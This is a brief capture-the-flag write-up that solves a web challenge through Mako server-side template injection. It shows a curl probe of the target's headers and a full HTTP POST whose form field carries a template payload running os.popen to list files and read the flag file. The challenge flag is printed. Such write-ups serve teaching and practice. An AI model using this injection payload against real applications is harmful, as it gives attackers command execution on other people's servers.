Exploit the shark and get the flag!
CTF{4b08602e0090f81707b98ca687a5cacfd32888ffceef1d3cff2d99e6034b1e58}
Mako template injection
On the website given we have an input field, a button, and a hello message. Submitting any value will change the hello message to Hello <message>!
.
Let’s see the headers of the response:
➜ ~ curl -I 34.107.115.255:30530
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 213
Server: Werkzeug/2.0.3 Python/3.6.9
Date: Sat, 21 May 2022 21:13:26 GMT
We see that it’s a Python server, which means it could be vulnerable to SSTI. The title of the challenge mentions a shark
, so the template engine must be Mako
.
As such, we send the following payload (using BurpSuite):
POST / HTTP/1.1
Host: 34.107.115.255:32539
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: <http://34.107.115.255:32539>
Connection: close
Referer: <http://34.107.115.255:32539/>
Upgrade-Insecure-Requests: 1
name=<%
import os
x=os.popen('cat flag').read() # initially 'ls' to see the files in the directory
%>
${x}
This gives out the flag, and we’ve completed the challenge.
CTF{4b08602e0090f81707b98ca687a5cacfd32888ffceef1d3cff2d99e6034b1e58}